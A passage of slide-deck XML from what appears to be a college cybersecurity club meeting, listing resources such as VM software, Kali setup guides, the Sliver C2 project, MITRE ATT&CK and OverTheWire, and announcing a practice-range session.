          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="515722" y="4321912"/>
            <a:ext cx="202997" cy="202996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="825" name="Google Shape;825;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="427253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VMware Fusion &amp; Workstation, free for personal use</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Google Shape;826;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857250" y="452628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blogs.vmware.com (Broadcom, Nov 2024)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="827" name="Google Shape;827;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="137160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28" name="Google Shape;828;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733392" y="1407262"/>
            <a:ext cx="202996" cy="202997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="829" name="Google Shape;829;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="135788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UTM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="830" name="Google Shape;830;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="161163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mac.getutm.app</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="831" name="Google Shape;831;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="1954530"/>
            <a:ext cx="274320" cy="2743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32" name="Google Shape;832;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733392" y="1990192"/>
            <a:ext cx="202996" cy="202997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="833" name="Google Shape;833;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="194081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UTM serial-console install workaround (macOS)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="834" name="Google Shape;834;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="219456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techrechard.com, "Install Kali on Mac Using UTM"</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="835" name="Google Shape;835;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="253746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36" name="Google Shape;836;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733392" y="2573122"/>
            <a:ext cx="202996" cy="202997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="837" name="Google Shape;837;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="252374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The TTY demystified (shells, PTYs)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="838" name="Google Shape;838;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="277749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linusakesson.net/programming/tty</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839" name="Google Shape;839;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="3120390"/>
            <a:ext cx="274320" cy="2743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40" name="Google Shape;840;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733392" y="3156052"/>
            <a:ext cx="202996" cy="202996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="841" name="Google Shape;841;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="310667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Sliver, open-source C2 framework</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="842" name="Google Shape;842;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="336042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github.com/BishopFox/sliver</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843" name="Google Shape;843;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="3703320"/>
            <a:ext cx="274320" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C726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44" name="Google Shape;844;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733392" y="3738982"/>
            <a:ext cx="202996" cy="202996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="845" name="Google Shape;845;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="368960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MITRE ATT&amp;CK: Command and Control tactic</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="846" name="Google Shape;846;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="394335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attack.mitre.org/tactics/TA0011</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="847" name="Google Shape;847;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="4286250"/>
            <a:ext cx="274320" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="66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48" name="Google Shape;848;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733392" y="4321912"/>
            <a:ext cx="202996" cy="202996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="849" name="Google Shape;849;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="4272534"/>
            <a:ext cx="3566160" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1B1E1D"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>OverTheWire wargames</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850" name="Google Shape;850;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074920" y="4526280"/>
            <a:ext cx="3566160" cy="2743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1C7268"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1C7268"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>overthewire.org</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="851" name="Google Shape;851;p39"/>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Resources</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="852" name="Google Shape;852;p39"/>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A39A8C"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="A39A8C"/>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0000"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="857" name="Shape 857"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="858" name="Google Shape;858;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6583680" y="3154680"/>
            <a:ext cx="4114800" cy="4114800"/>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859" name="Google Shape;859;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="288036"/>
            <a:ext cx="7200900" cy="24003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4AD4C4"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4AD4C4"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>NEXT SESSION</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860" name="Google Shape;860;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1303020"/>
            <a:ext cx="7543800" cy="8229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400"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Thursday: bring your VM to the Range</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861" name="Google Shape;861;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2160270"/>
            <a:ext cx="7200900" cy="6172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6DFD5"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E6DFD5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>You'll SSH from your new Kali VM into the club's practice range and start on OverTheWire, the same fundamentals from tonight, just with a scoreboard.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="862" name="Google Shape;862;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582930" y="3154680"/>
            <a:ext cx="329184" cy="329184"/>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63" name="Google Shape;863;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="625724" y="3197474"/>
            <a:ext cx="243596" cy="243596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="864" name="Google Shape;864;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1062990" y="3168396"/>
            <a:ext cx="6172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6DC"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="EDE6DC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Simons 281, College of Charleston</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="865" name="Google Shape;865;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582930" y="3579876"/>
            <a:ext cx="329184" cy="329184"/>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66" name="Google Shape;866;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="625724" y="3622670"/>
            <a:ext cx="243596" cy="243596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="867" name="Google Shape;867;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1062990" y="3593592"/>
            <a:ext cx="6172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6DC"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="EDE6DC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Tuesdays &amp; Thursdays, 5:30-7:00 PM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="868" name="Google Shape;868;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582930" y="4005072"/>
            <a:ext cx="329184" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4D000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eencoded.png" id="869" name="Google Shape;869;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="625724" y="4047866"/>
            <a:ext cx="243596" cy="243596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870" name="Google Shape;870;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1062990" y="4018788"/>
            <a:ext cx="6172200" cy="30861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EDE6DC"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="EDE6DC"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>VM not booting? Ask in Discord before Thursday</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="871" name="Google Shape;871;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="4896612"/>
            <a:ext cx="5486400" cy="20574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Next up</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
